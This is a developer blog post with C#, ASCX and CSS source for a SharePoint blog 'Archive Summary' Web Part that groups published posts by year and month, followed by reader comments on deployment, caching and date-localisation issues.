xnheap *h) if (heap->handle) xnregistry_remove(heap->handle); - if (xnsynch_destroy(&heap->synch_base) == XNSYNCH_RESCHED) + xeno_mark_deleted(heap); + + resched = xnsynch_destroy(&heap->synch_base); + + xnlock_put_irqrestore(&nklock, s); + +#ifdef CONFIG_XENO_OPT_PERVASIVE + if (heap->cpid) { + heap->cpid = 0; + xnfree(heap); + } +#endif + if (resched) /* * Some task has been woken up as a result of the * deletion: reschedule now. */ xnpod_schedule(); - - xnlock_put_irqrestore(&nklock, s); } /** @@ -404,7 +415,7 @@ int rt_heap_delete_inner(RT_HEAP *heap, void __user *mapaddr) /* * The heap descriptor has been marked as deleted before we - * released the superlock thus preventing any sucessful + * released the superlock thus preventing any successful * subsequent calls of rt_heap_delete(), so now we can * actually destroy it safely. */ diff --git a/ksrc/skins/native/queue.c b/ksrc/skins/native/queue.c index 527bde8..35e292b 100644 --- a/ksrc/skins/native/queue.c +++ b/ksrc/skins/native/queue.c @@ -286,6 +286,7 @@ int rt_queue_create(RT_QUEUE *q, static void __queue_post_release(struct xnheap *heap) { RT_QUEUE *q = container_of(heap, RT_QUEUE, bufpool); + int resched; spl_t s; xnlock_get_irqsave(&nklock, s); @@ -295,14 +296,24 @@ static void __queue_post_release(struct xnheap *heap) if (q->handle) xnregistry_remove(q->handle); - if (xnsynch_destroy(&q->synch_base) == XNSYNCH_RESCHED) + xeno_mark_deleted(q); + + resched = xnsynch_destroy(&q->synch_base); + + xnlock_put_irqrestore(&nklock, s); + +#ifdef CONFIG_XENO_OPT_PERVASIVE + if (q->cpid) { + q->cpid = 0; + xnfree(q); + } +#endif + if (resched) /* - * Some task has been woken up as a result of - * the deletion: reschedule now. + * Some task has been woken up as a result of the + * deletion: reschedule now. */ xnpod_schedule(); - - xnlock_put_irqrestore(&nklock, s); } /** @@ -366,7 +377,7 @@ int rt_queue_delete_inner(RT_QUEUE *q, void __user *mapaddr) /* * The queue descriptor has been marked as deleted before we - * released the superlock thus preventing any sucessful + * released the superlock thus preventing any successful * subsequent calls of rt_queue_delete(), so now we can * actually destroy the associated heap safely. */ diff --git a/ksrc/skins/native/syscall.c b/ksrc/skins/native/syscall.c index 28c720e..a75ed3b 100644 --- a/ksrc/skins/native/syscall.c +++ b/ksrc/skins/native/syscall.c @@ -2073,24 +2073,17 @@ static int __rt_queue_delete(struct pt_regs *regs) { RT_QUEUE_PLACEHOLDER ph; RT_QUEUE *q; - int err; if (__xn_safe_copy_from_user(&ph, (void __user *)__xn_reg_arg1(regs), sizeof(ph))) return -EFAULT; - q = (RT_QUEUE *)xnregistry_fetch(ph.opaque); - - if (!q) - err = -ESRCH; - else { - /* Callee will check the queue descriptor for validity again. */ - err = rt_queue_delete_inner(q, (void __user *)ph.mapbase); - if (!err && q->cpid) - xnfree(q); - } + q = xnregistry_fetch(ph.opaque); + if (q == NULL) + return -ESRCH; - return err; + /* Callee will check the queue descriptor for validity again. */ + return rt_queue_delete_inner(q, (void __user *)ph.mapbase); } /* @@ -2604,24 +2597,17 @@ static int __rt_heap_delete(struct pt_regs *regs) { RT_HEAP_PLACEHOLDER ph; RT_HEAP *heap; - int err; if (__xn_safe_copy_from_user(&ph, (void __user *)__xn_reg_arg1(regs), sizeof(ph))) return -EFAULT; - heap = (RT_HEAP *)xnregistry_fetch(ph.opaque); - - if (!heap) - err = -ESRCH; - else { - /* Callee will check the heap descriptor for validity again. */ - err = rt_heap_delete_inner(heap, (void __user *)ph.mapbase); - if (!err && heap->cpid) - xnfree(heap); - } + heap = xnregistry_fetch(ph.opaque); + if (heap == NULL) + return -ESRCH; - return err; + /* Callee will check the heap descriptor for validity again. */ + return rt_heap_delete_inner(heap, (void __user *)ph.mapbase); } /* > But I still think this approach has too complex (and so far > undocumented) user-visible semantics and is going the wrong path. > Granted, this is a bit convoluted. This stems from the fact that should a shared heap deletion fail due to -EBUSY, you have to keep the mapping alive for other threads sharing the same mm context that the caller, so that the memory segment does not get wiped away "inadvertently". This is basically why the last unmapping is done by the nucleus itself, since all the tested conditions for the deletion to succeed have to be done from a syscall context in order to preserve atomicity. However, the only undocumented behavior is that failing to delete a heap keeps its descriptor alive, thus allowing further bindings to it; which is basically what a failing rmmod allows for a module for instance. People can live with this for now. > > xnlock_put_irqrestore(&nklock, s); > > + > > +#ifdef CONFIG_XENO_OPT_PERVASIVE > > + if (heap->cpid) > > + xnfree(heap); > > +#endif > > } > > > > /** > > diff --git a/ksrc/skins/native/queue.c b/ksrc/skins/native/queue.c > > index 527bde8..50af544 100644 > > --- a/ksrc/skins/native/queue.c > > +++ b/ksrc/skins/native/queue.c > > @@ -303,6 +303,11 @@ static void __queue_post_release(struct xnheap *heap) > > xnpod_schedule(); > > > > xnlock_put_irqrestore(&nklock, s); > > + > > +#ifdef CONFIG_XENO_OPT_PERVASIVE > > + if (q->cpid) > > + xnfree(q); > > +#endif > > } > > > > /** > > > >> I'm not sure if that object migration to the global queue helps to some > >> degree here (it's not really useful due to other problems, will post a > >> removal patch) - I've build Xenomai support into the kernel... > >> > > > > This is a last resort action mainly aimed at kernel-based apps, assuming > > that rmmoding them will ultimately flush the pending objects. We need > > this. > > Kernel-based apps do not stress this path at all, their objects are > already in the global queue. Only user-allocated objected can be requeued. > When I'm reading "will post a removal patch", I tend to have a Pavlovian reaction considering that you want to remove all the global queue mechanism, which is what I nacked. No objection to stop using it for userland resources though. > And that either indicates open issues in the cleanup path (ie. some > objects may practically never be deleted) or is superfluous as a > deferred cleanup mechanism will take care (namely the one of the xnheap). > > > > > We might want to avoid linking to the global queue whenever the deletion > > call returns -EBUSY though, assuming that a post-release hook will do > > the cleanup, but other errors may still happen. > > Even more important: -EIDRM, or we continue to risk serious corruptions. > Better remove this altogether. > -EBUSY is returned precisely because the heap is still in a sane state; obviously, if you want to kill the front end descriptor instead, then -EIDRM would be required, no problem with this. But there is no risk of corruption today if one uses the internal deletion protocol properly. > > > >>>> I'm in the process of fixing this, but that latter two are tricky. They > >>>> need user space information (the user space address of the mapping base) > >>>> for ordinary cleanup, and this is not available otherwise. > >>>> > >>>> At the time we are called with our cleanup handler, can we assume that > >>>> the dying process has already unmapped all its rtheap segments? > >>> Unfortunately, no. Cleanup is a per-skin action, and the process may be > >>> bound to more than a single skin, which could turn out as requiring a > >>> sequence of cleanup calls. > >>> > >>> The only thing you may assume is that an attempt to release all memory > >>> mappings for the dying process will have been done prior to receive the > >>> cleanup event from the pipeline, but this won't help much in this case. > >> That's already very helpful! > >> > > > > Not really, at least this is not relevant to the bug being fixed. > > Additionally, the release attempt may fail due to pending references. > > For which kind of objects? What kind of references? At least according > to the docs, there is only the risk of -EBUSY with heaps and queues. All > other objects terminate properly. I'm talking bout internal references. The deletion caller has to maintain a numaps reference on the object it destroys while it makes sure the deletion may be applied. Most of the logic stems from this. > > > > >>> This attempt may fail and be postponed though, hence the deferred > >>> release callback fired via vmclose. > >> I already started to look into the release callback thing, but I'm still > >> scratching my head: Why do you set the callback even on explicit > >> rt_heap/queue_delete? I mean those that are supposed to fail with -EBUSY > >> and then to be retried by user land? > > > > Userland could retry, but most of the time it will just bail out and > > leave this to vmclose. > > > >> What happens if rt_heap_unbind and > >> retried rt_heap_delete race? > >> > > > > A successful final unmapping clears the release handler. > > rt_heap_unbind would trigger the release handler, thus the object > deletion, and the actual creator would find the object destroyed under > its feet despite failed deletion is supposed to leave the object intact. > That's the kind of complex semantics I was referring to. You seem to be mixing heaps, queues and other objects. As far as those are concerned, the creator still holds a reference, so unbinding them would not trigger the release handler. > > Let's get this right: If the creator of a shared semaphore deletes that > object, it's synchronously removed; anyone trying to use it is informed. > That's reasonable to expect from heaps and queues as well, IMHO. The > only exception is the mapped memory of the associated heaps. It must not > vanish under other users feet. But they will no longer be able to issue > native commands on those objects. > Yes, we are still discussing the option of invalidating the front-end object upon deletion, regardless of what has to be done with the backend resource, fair enough. I agree this is a common pattern, but this is not immediately required to have a correct behavior. > > > >> Anyway, auto-cleanup of heap and queue must be made none-failing, ie. > >> the objects have to be discarded, just the heap memory deletion has to > >> be deferred. I'm digging into this direction, but I'm still wondering if > >> the none-automatic heap/queue cleanup is safe in its current form. > >> > > > > This seems largely overkill for the purpose of fixing the leak. Granted, > > the common pattern would rather be to invalidate the front-end object > > (heap/queue desc) and schedule a release for the backend one (i.e. > > shared mem). However, the only impact this has for now is to allow apps > > to keep an object indefinitely busy by binding to it continuously albeit > > a deletion request is pending; I don't think this deserves a major > > change in the cleanup actions at this stage of 2.5. Cleanup stuff > > between userland and kernel space is prone to regression. > > It's not overkill, it's required to reduce complexity, simplify the > semantics, and reducing risks of more hidden bugs in yet unstressed > corner cases. IMHO, -EBUSY on rt_heap/queue_delete is inappropriate. > Well, I can tell you that there are quite a few corner cases you would face in rewriting the queue/heap cleanup code. I'm not saying this should not be done, I just won't merge this to 2.5.0 to avoid more regressions. Let's fix the obvious for now, such as the missing descriptor deallocation in the post-release callback, and schedule a global cleanup refactoring for 2.5.1. > Jan > -- Philippe. _______________________________________________ Xenomai-core mailing list Xenomai-core@gna.org
https://www.mail-archive.com/xenomai-core@gna.org/msg07455.html
CC-MAIN-2018-26
refinedweb
2,015
62.48
reactifyreactify The first and only true Functional Reactive Programming framework for Scala. JustificationJustification How can we say it's the first true FRP framework for Scala? Simple, because it is. In all other frameworks they add special framework-specific functions to do things like math (ex. adding two variables together), collection building (ex. a special implementation of ::: to concatenate two variables containing lists), or similar mechanisms to Scala's built-in collection manipulation (ex. map). These are great and mostly fill in the gaps necessary to solve your problems. But the goal for Reactify was a bit loftier. We set out to create a system that actually allows you to use ANY Scala functionality just like you would normally without any special magic (like Scala.rx's special operations require:). In Reactify you just write code like you normally would and as used Vars and Vals change the reactive properties they have been assigned to will update as well. If you need a bit more clarification on just what the heck we mean, jump ahead to the More AdvancedExamples. SetupSetup reactify is published to Sonatype OSS and Maven Central currently supporting: - Scala and Scala.js (2.11, 2.12, and 2.13) - Scala Native (2.11) - Scala 3 / Dotty (0.26) Configuring the dependency in SBT simply requires: libraryDependencies += "com.outr" %% "reactify" % "4.0.2" or, for Scala.js / Scala Native / cross-building: libraryDependencies += "com.outr" %%% "reactify" % "4.0.2" ConceptsConcepts This framework is intentionally meant to be a simplistic take on properties and functional reactive concepts. There are only four specific classes that really need be understood to take advantage of the framework: - Reactive - As the name suggests it is a simple trait that fires values that may be reacted to by Reactions. - Channel - The most simplistic representation of a Reactive, simply provides a public :=to fire events. No state is maintained. - Val - Exactly as it is in Scala, this is a final variable. What is defined at construction is immutable. However, the contents of the value, if they are Reactivemay change the ultimate value of this, so it is is Reactiveitself and holds state. - Var - Similar to Valexcept it is mutable as it mixes in Channelto allow setting of the current value. Val and Var may hold formulas with Reactives. These Reactives are listened to when assigned so the wrapping Val or Var will also fire an appropriate event. This allows complex values to be built off of other variables. UsingUsing ImportsImports Props is a very simple framework and though you'll likely want access to some of the implicit conversions made available in the package, everything can be had with a single import: import reactify._ CreatingCreating As discussed in the concepts there are only four major classes in Props ( Reactive, Channel, Val, and Var). Of those classes, unless you are creating a custom Reactive you will probably only deal with the latter three. Creating instances is incredibly simple: val myChannel = Channel[String] // Creates a Channel that receives Strings val myVar = Var[Int](5) // Creates a Var containing the explicit value `5` val myVal = Val[Int](myVar + 5) // Create a Val containing the sum of `myVar` + `5` Listening for ChangesListening for Changes This would all be pretty pointless if we didn't have the capacity to listen to changes on the values. Here we're going to listen to myVal and println the new value when it changes: myVal.attach { newValue => println(s"myVal = $newValue") } Modifying the ValueModifying the Value Since myVal is a Val it is immutable itself, but its value is derived from the formula myVar + 5. This means that a change to myVar will cause the value of myVal to change as a result: myVar := 10 The above code modifies myVar to have the new value of 10. This will also cause myVal to re-evaluate and have the new value of 15 ( myVar + 5). As a result, the observer we attached above will output: myVal = 15 Derived ValuesDerived Values You can do clever things like define a value that is derived from other values: val a = Var("One") val b = Var("Two") val c = Var("Three") val list = Val(List(a, b, c)) list() // Outputs List("One", "Two", "Three") a := "Uno" b := "Dos" c := "Tres" list() // Outputs List("Uno", "Dos", "Tres") More Advanced ExamplesMore Advanced Examples This is all pretty neat, but it's the more complex scenarios that show the power of what you can do with Reactify: Complex Function with ConditionalComplex Function with Conditional val v1 = Var(10) val v2 = Var("Yes") val v3 = Var("No") val complex = Val[String] { if (v1 > 10) { v2 } else { v3 } } Any changes to v1, v2, or v3 will fire a change on complex and the entire inlined function will be re-evaluated. Multi-Level ReactiveMulti-Level Reactive A much more advanced scenario is when you have a Var that contains a class that has a Var and you want to keep track of the resulting value no matter what the first Var's instance is currently set to. Consider the following two classes: class Foo { val active: Var[Boolean] = Var(false) } class Bar { val foo: Var[Option[Foo]] = Var[Option[Foo]](None) } A Bar has a Var foo that holds an Option[Foo]. Now, say I have a Var[Option[Bar]]: val bar: Var[Option[Bar]] = Var[Option[Bar]](None) If we want to determine active on Foo we have several layers of mutability between the optional bar Var, the optional foo Var, and then the ultimate active Var in Foo. For a one-off we could do something like: val active: Boolean = bar().flatMap(_.foo().map(_.active())).getOrElse(false) This would give us true only if there is a Bar, Bar has a Foo, and active is true. But, if we want to listen for when that changes at any level ( Bar, Foo, and active) it should be just as easy. Fortunately with Reactify it is: val active: Val[Boolean] = Val(bar().flatMap(_.foo().map(_.active())).getOrElse(false)) Yep, it's that easy. Now if I set bar to Some(new Bar) then foo := Some(new Foo) on that, and finally set active to true on Foo my active Val will fire that it has changed. Reactify will monitor every level of the Vars and automatically update itself and fire when the resulting value from the function above has changed. // Monitor the value change active.attach { b => ... do something ... } // Set Bar val b = new Bar bar := Some(b) // Set Foo val f = new Foo b.foo := Some(f) // Set active f.active := true With Reactify you don't have to do any magic in your code, you just write Scala code the way you always have and let Reactify handle the magic. ChannelsChannels As we saw above, Var and Val retain the state of the value assigned to them. A Channel on the other hand is like a Var (in that you can set values to it), but no state is retained. This is useful for representing firing of events or some other action that is meant to be observed but not stored. Nifty FeaturesNifty Features Dependency VariablesDependency Variables The core functionality is complete and useful, but we can build upon it for numeric values that are dependent on other numeric values or numeric values that may have multiple representations. For example, consider a graphical element on screen. It may have a left position for the X value originating on the left side of the element, but if we want to right-align something we have to make sure we account for the width in doing so and vice-versa for determining the right edge. We can simplify things by leveraging a Dep instance to represent it: val width: Var[Double] = Var(0.0) val left: Var[Double] = Var(0.0) val center: Dep[Double, Double] = Dep(left)(_ + (width / 2.0), _ - (widht / 2.0)) val right: Dep[Double, Double] = Dep(left)(_ + width, _ - width) Notice we've even added a center representation. These are dependent on left but their value is derived from a formula based on left and width. Of course, if representing the value alone were all we care about then a simple Val(left + width) could be used as our right value, but we also want to be able to modify center or right and have it properly reflect in left. Any changes made to Dep will properly update the variable it depends on left in this case. See DepsSpec for more detailed examples. Dep also supports conversions between different types as well. BindingBinding As of 1.6 you can now do two-way binding incredibly easily: val a = Var[String]("Hello") val b = Var[String]("World") val binding = a bind b By default this will assign the value of a to b and then changes to either will propagate to the other. If you want to detach the binding: binding.detach() This will disconnect the two to operate independently of each other again. You can also do different typed binding: implicit val s2i: String => Int = (s: String) => Integer.parseInt(s) implicit val i2s: Int => String = (i: Int) => i.toString val a = Var[String]("5") val b = Var[Int](10) a bind b We need implicits to be able to convert between the two, but now changes to one will propagate to the other.
https://index.scala-lang.org/outr/reactify/props/1.1.0?target=_2.11
CC-MAIN-2021-17
refinedweb
1,570
61.16
#include "NOX.H" #include "NOX_Common.H" #include "NOX_Utils.H" #include "NOX_LAPACK_Group.H" This test problem is a modified extension of the "Broyden Tridiagonal Problem" from Jorge J. More', Burton S. Garbow, and Kenneth E. Hillstrom, Testing Unconstrained Optimization Software, ACM TOMS, Vol. 7, No. 1, March 1981, pp. 14-41. The modification involves squaring the last equation fn(x) and using it in a homotopy-type equation. The parameter "lambda" is a homotopy-type parameter that may be varied from 0 to 1 to adjust the ill-conditioning of the problem. A value of 0 is the original, unmodified problem, while a value of 1 is that problem with the last equation squared. Typical values for increasingly ill-conditioned problems might be 0.9, 0.99, 0.999, etc. The standard starting point is x(i) = -1, but setting x(i) = 0 tests the selected global strategy.
http://trilinos.sandia.gov/packages/docs/r6.0/packages/nox/doc/html/Broyden_8C.html
CC-MAIN-2014-15
refinedweb
147
52.66
Core Python: Comparing Single vs. Multithread Execution Core Python: Comparing Single vs. Multithread Execution Join the DZone community and get the full member experience.Join For Free Read this guide to learn everything you need to know about RPA, and how it can help you manage and automate your processes. This is an excerpt from Wesley Chun's recent book Core Python Applications Programming Multithreaded Programming > 4.1 Introduction/Motivation 157.6) single-threaded fashion, followed by the alternative with multiple threads. #!/usr/bin/env python from myThread import MyThread from time import ctime, sleep def fib(x): sleep(0.005) if x < 2: return 1 return (fib(x-2) + fib(x-1)) def fac(x): sleep(0.1) if x < 2: return 1 return (x * fac(x-1)) def sum(x): sleep(0.1) if x < 2: return 1 return (x + sum(x-1)) funcs = [fib, fac, sum] n = 12 def main(): nfuncs = range(len(funcs)) print '*** SINGLE THREAD' for i in nfuncs: print 'starting', funcs[i].__name__, 'at:', \ ctime() print funcs[i](n) print funcs[i].__name__, 'finished at:', \ ctime() print '\n*** MULTIPLE THREADS' threads = [] for i in nfuncs: t = MyThread(funcs[i], (n,), funcs[i].__name__) threads.append(t) for i in nfuncs: threads[i].start() for i in nfuncs: threads[i].join() print threads[i].getResult() print 'all DONE' if __name__ == '__main__': 8160 78 all DONE The full chapter's table of contents include: - Introduction/Motivation - Threads and Processes - Threads and Python - The thread Module - The threading Module - Comparing Single vs. Multithreaded Execution - Multithreading in Practice - Producer-Consumer Problem and the Queue/queue Module - Alternative Considerations to Threads - Related Modules The book is available for purchase through Amazon.com, or you can read it online at SafarBooksOnline.com Get the senior executive’s handbook of important trends, tips, and strategies to compete and win in the digital economy. Published at DZone with permission of Chris Smith . See the original article here. Opinions expressed by DZone contributors are their own. {{ parent.title || parent.header.title}} {{ parent.tldr }} {{ parent.linkDescription }}{{ parent.urlSource.name }}
https://dzone.com/articles/book-excerpt-core-python
CC-MAIN-2018-13
refinedweb
345
50.43
After populating the Tree View nodes, I had to handle the SelectedNodeChanged event to redirect to the Date.aspx page and pass the correct StartDateTime and EndDateTime query string parameters. The query string structure is fairly easy, you needed to supply the time span parameters and the title. For example, to get all the posts in December 2011 the URL should look like this:. Notice that the start and end times are passed in ISO8601 formats. 1: <SharePoint:CssRegistration 2: Name="<% $SPUrl:~sitecollection/_layouts/styles/SharePointStack/SPBlogTemplate/SPBlogTemplate.css %>" 3:</SharePoint:CssRegistration> 4: <div id="SPBlogContainer"> 5: <div id="ArchiveSummaryTitle"><a id="ViewArchive" title="Click to view Archive" runat="server">Archives</a></div> 6: <asp:TreeView ID="ArchiveSummaryTree" runat="server" ExpandDepth="0" 7:</asp:TreeView> 8: <asp:Literal</asp:Literal> 9: </div> The markup is straight forward: I place a title, Tree View, and a Literal. I had to apply some CSS formatting to make sure that the Web Part looks like a SharePoint control. I created a CSS file and placed it under the STYLES mapped folder. The CSS helped me adjust the padding and text formatting. 1: #ArchiveSummaryTitle 2: { 3: color: #0072bc; 4: font-size: 1.2em; 5: font-weight: normal; 6: } 7: 8: #SPBlogContainer 9: { 10: padding-left: 11px; 11: } 1: namespace SharePointStack.SPBlogTemplate 2: { 3: class SPBlogPost 4: { 5: public SPBlogPost(string title, string month, string year) 6: { 7: postTitle = title; 8: publishingMonth = month; 9: publishingYear = year; 10: } 11: 12: private string postTitle; 13: 14: public string PostTitle 15: { 16: get { return postTitle; } 17: set { postTitle = value; } 18: } 19: 20: private string publishingMonth; 21: 22: public string PublishingMonth 23: { 24: get { return publishingMonth; } 25: set { publishingMonth = value; } 26: } 27: 28: private string publishingYear; 29: 30: public string PublishingYear 31: { 32: get { return publishingYear; } 33: set { publishingYear = value; } 34: } 35: } 36: } 1: using System; 2: using System.Collections.Generic; 3: using System.Linq; 4: using System.Web.Caching; 5: using System.Web.UI; 6: using System.Web.UI.WebControls; 7: using Microsoft.SharePoint; 8: using Microsoft.SharePoint.Utilities; 9: 10: namespace SharePointStack.SPBlogTemplate.ArchiveSummary 11: { 12: public partial class ArchiveSummaryUserControl : UserControl 13: { 14: static object _lock = new object(); 15: List<SPBlogPost> postsBuffer = new List<SPBlogPost>(); 16: List<int> years = new List<int>(); 17: string[] months = { "January", "February", "March", "April", "May", "June", "July", "August", 18: "September", "October", "November", "December" }; 19: bool duplicates; 20: 21: protected void Page_Load(object sender, EventArgs e) 22: { 23: if (!Page.IsPostBack) 24: { 25: try 26: { 27: //I chose "using" to automatically dispose SharePoint objects 28: using (SPSite blogSiteCollection = SPContext.Current.Site) 29: { 30: using (SPWeb blogWeb = blogSiteCollection.OpenWeb(SPContext.Current.Web.ServerRelativeUrl)) 31: { 32: SPList blogPosts = blogWeb.Lists["Posts"]; 33: 34: //Set the header link 35: ViewArchive.HRef = blogPosts.DefaultViewUrl; 36: 37: SPQuery queryPosts = new SPQuery(); 38: 39: //CAML Query that returns only published posts and orders them by date 40: queryPosts.Query = "<OrderBy><FieldRef Name='PublishedDate'/></OrderBy>" + 41: "<Where><Eq><FieldRef Name='_ModerationStatus' />" + 42: "<Value Type='ModStat'>0</Value></Eq></Where>"; 43: 44: //Pull the query results directly from the Cache, we don't want to query 45: //SharePoint everytime the Archives Summary Web Part runs. This practice increases 46: //the performance and comes very handy if the user is an active blogger. 47: SPListItemCollection publishedPosts = (SPListItemCollection)Cache["PublishedPosts"]; 48: 49: //If the query results are not avilable in the Cache, then we need to execute the query and 50: //store the results in the Cache for the next request. 51: //The Cache is set with Sliding Expiration of 1 day. 52: if (publishedPosts == null) 53: { 54: //Since SPWeb is not thread safe, we need to place a lock. 55: lock (_lock) 56: { 57: //Ensure that the data was not loaded by a concurrent thread while waiting for lock. 58: publishedPosts = blogPosts.GetItems(queryPosts); 59: Cache.Add("PublishedPosts", publishedPosts, null, Cache.NoAbsoluteExpiration, 60: TimeSpan.FromDays(1), CacheItemPriority.High, null); 61: } 62: } 63: 64: //Load all published posts into the postsBuffer. The query results will not be available 65: //outside the "using" block. 66: foreach (SPListItem post in publishedPosts) 67: postsBuffer.Add(new SPBlogPost(post["Title"].ToString(), 68: DateTime.Parse(post["PublishedDate"].ToString()).Month.ToString(), 69: DateTime.Parse(post["PublishedDate"].ToString()).Year.ToString())); 70: } 71: } 72: 73: //Provision years 74: foreach (SPBlogPost post in postsBuffer) 75: years.Add(int.Parse(post.PublishingYear)); 76: 77: //Make sure we only have distinct years that are sorted in descending order 78: var yearsList = years.Distinct().ToList(); 79: yearsList.Sort(); 80: yearsList.Reverse(); 81: 82: //Add the years to the Tree View 83: foreach (int year in yearsList) 84: ArchiveSummaryTree.Nodes.Add(new TreeNode(year.ToString())); 85: 86: //Find out which months have posts in each year and add them to the Tree View as ChildNodes 87: foreach (TreeNode year in ArchiveSummaryTree.Nodes) 88: { 89: for (int i = 12; i >= 1; i--) 90: { 91: foreach (SPBlogPost post in postsBuffer) 92: { 93: if (post.PublishingMonth == i.ToString() && post.PublishingYear == year.Text) 94: { 95: duplicates = false; 96: foreach (TreeNode item in year.ChildNodes) 97: { 98: //Check for any duplicate month entries. 99: //This will become an issue if the user posts more than one post in a month time. 100: if (item.Text.ToLower() == months[int.Parse(post.PublishingMonth) - 1].ToLower()) 101: duplicates = true; 102: } 103: if (!duplicates) 104: year.ChildNodes.Add(new TreeNode(months[int.Parse(post.PublishingMonth) - 1], 105: post.PublishingMonth, null, null, null)); 106: } 107: } 108: } 109: } 110: 111: //Expand the latest year node 112: if (ArchiveSummaryTree.Nodes[0] != null) 113: ArchiveSummaryTree.Nodes[0].Expand(); 114: } 115: catch (Exception ex) 116: { 117: //Print the error messege to the user using a Literal 118: ArchiveSummaryErrors.Text = "<img src='" + SPContext.Current.Site + 119: "_layouts/images/SharePointStack/SPBlogTemplate/error.png' alt='Error' style='display: block;' />" + 120: " <font color='#ff0000' size='12'>" + ex.Message + "</font>"; 121: } 122: finally 123: { 124: //Objects will be disposed during the next Garbage Collector run 125: postsBuffer = null; 126: years = null; 127: } 128: } 129: } 130: 131: protected void ArchiveSummaryTree_SelectedNodeChanged(object sender, EventArgs e) 132: { 133: TreeView summaryLinks = (TreeView)sender; 134: 135: //Make sure that this is a month node, we don't want to handle a year node selection change 136: if (summaryLinks.SelectedNode.Parent != null) 137: { 138: string month = string.Empty, year = string.Empty; 139: month = summaryLinks.SelectedNode.Value; 140: year = summaryLinks.SelectedNode.Parent.Value; 141: 142: //Build the date strings to be converted later on to ISO8601 dates 143: string startDate = month + "/1/" + year; 144: string endDate = startDate; 145: 146: //Convert the dates and set the range to be a one month time span 147: startDate = SPUtility.CreateISO8601DateTimeFromSystemDateTime(DateTime.Parse(startDate)); 148: endDate = SPUtility.CreateISO8601DateTimeFromSystemDateTime(DateTime.Parse(startDate).AddMonths(1)); 149: 150: //Build the URL and set the Query String parameters for redirection to the Date.aspx page 151: string url = SPContext.Current.Site + SPContext.Current.Web.ServerRelativeUrl + 152: "/Lists/Posts/Date.aspx?StartDateTime=" + startDate + "&EndDateTime=" + endDate + 153: "&LMY=" + months[int.Parse(month) - 1] + ", " + year; 154: 155: summaryLinks.Dispose(); 156: 157: //SharePoint will add "SPSite Url=" to the URL we built. I used Substring to remove it. 158: Response.Redirect(url.Substring(11)); 159: } 160: } 161: } 162: } Web Part Source Code Download Super 🙂 Just tried it and it works Thanks I am glad you like it Jorgan 🙂 any plans for implementing in sandbox? In VS11 you can build Visual WebParts to run with the Sandbox subset. No need for rewriting the WebPart 🙂 I installed your webpart and it is not working for me. I receive a 404 error when clicking on the tree nodes for archived months. Hi Charles, Can you please post the blog site URL and the URL you are redirected to by the tree nodes (404)? I think you are being redirected to a wrong URL. Thanks for the response. The blog site is on a site behind our company firewall. The url of the blog is the same after clicking on the archive link as shown in the pics.…/photostream…/photostream Hi Charles, I need the URL or at least a hint on how it looks before you click and how it becomes after you click and get the 404 from the address bar, not the status bar please 🙂 I can't seem to get this to work. I installed the webpart and made posting dated "back in time". As I understand the tree view is then supposed to create the months automatically, but that doesn't happen. What am I doing wrong? Hi Kathrine, Can you please send a screenshot? As you can see in my code above, I query the Posts list for any Published Posts regardless when they where posted. Are these posts published? Hello Bandar I just went in to look at bit more at the issue and found that it had picked up the postings I did yesterday. Do you have any idea would could cause that? Please let me know, if a screendump would still help after this piece of information. Thank you for the great work on this webpart and your help. No worries Kathrine 🙂 When I query the Posts list, I check first if it is available in the cache: SPListItemCollection publishedPosts = (SPListItemCollection)Cache["PublishedPosts"]; and If it is not then I execute the query and push it in the cache which lives for one day: publishedPosts = blogPosts.GetItems(queryPosts); Cache.Add("PublishedPosts", publishedPosts, null, Cache.NoAbsoluteExpiration, TimeSpan.FromDays(1), CacheItemPriority.High, null); So every time you add a post, you will have to wait till the next day, or you can execute an IISReset 🙂 and if you like coding you can always amend the source code and remove the cache logic or minimize the cache life. The code is well documented so it will be fairly an easy task. Hello Bandar That makes sense – Thank you! 🙂 BR Kathrine You are most welcome 🙂 Hello again We have now deployed the webpart in our production environment and somehow it isn't working as it should. The webpart displays the months as it should, but when clicking on each month it still shows all posts, instead of the posts from that specific month. I have checked the url and compared it to the url in the test enviroment and the both look like this: Test environment (that works) /Lists/Posts/Date.aspx?StartDateTime=2012-02-01T00:00:00Z&EndDateTime=2012-03-01T01:00:00Z&LMY=February,%202012 Production (Shows all posts) /Lists/Posts/Date.aspx?StartDateTime=2012-04-01T00:00:00Z&EndDateTime=2012-05-01T02:00:00Z&LMY=April,%202012 I am really puzzled as to why this isn't working… Can you help out? Thank you Kathrine I am trying to deploy the web part but i do not know how can i use it Sorry – scratch my last post – it seems to be working now. Thanks. Dave Sorry – me again! It seems to be working insofar that the list of years and months is produced. However when one clicks on an entry no posts are displayed – this is because the StartDateTime and EndDateTime URL paremeters appear to be wrong: http://<blogURL>/Lists/Posts/Date.aspx?StartDateTime=2012-01-11T00:00:00Z&EndDateTime=2012-02-11T00:00:00Z&LMY=November,%202012 Note that start is listed as 2012-01-11 and the end is 2012-02-11 whereas they should be 2012-11-01 and 2012-11-30. This looks like a localisation issue perhaps (I'm in the UK)? Thanks Dave Hi! I need help deploying this. Can this be deployed at the site level or must it be deployed at the farm level only? Thank you! I am trying to deploy this webpart. Can it be deployed at the site level or must it be deployed at the farm level? Hi Dave, Does it work if you flip the day and month in the query string? If yes, then I guess its related to the culture settings, never thought if that when I wrote the web part loool. Please let me know what you find out. Hi Matt, Unfortunately no, this is a farm solution with a feature on the collection level to activate/deactivate. A quick work around would be using the VS2012 Visual WebPart template which can be deployed later as a Sandbox solution. Please let me know if you need support with it. is it possible in share point 2013 by out of box Thank for this. I just fixed some translation issues with this webpart and submitted patch to codeplex. I hope you can apply patch and make it available as new version. I'm just noob with c# and web parts, but lets hope that patch is fine. 😉 does this one work on SP2013? If so, can someone post a guide how to install it. Hi, This solution seems to be very useful. How can we add this code into SharePoint 2013? Is it possible to do theese thing in SharePoint 2013? İf possible how? Can you help me please? Yes, it should work in SP2013. It's just aggregating list items and rendering the content. What do you need help with deployment? Do you have specific questions or just never deployed farm solutions before? In both cases I am here 🙂 Same issue here. SP13 seems to not like the wsp file. I am getting this message: "The file you imported is not valid. Verify that the file is a Web Part description file (*.webpart or *.dwp) and that it contains well-formed XML." You can't use the same WSP file, you will have to download the source, reference the right assemblies, and then package. Code will work of course, not changes needed. If you can't do it, then I will do it over the weekend and add it to the post. Let me know if you want me to 🙂 Any Chance you did this for SP2013 or SP Online? This is exactly what I need… Please help? Thanks, Sam Hi, Did you ever got the chance to repackaged so it can be use with SharePoint 2013? This can be very useful for those migrating blogs from different sources to SP. Great Work! Thanks Hi, I want to create archive like this– November 2007 (2) February 2006 (1)… but i don't have Visual studio, so How can create this kind archive with SharePoint Designer only, please suggest. Thanks RenuSh Hi Bandar, your webpart looks exactly 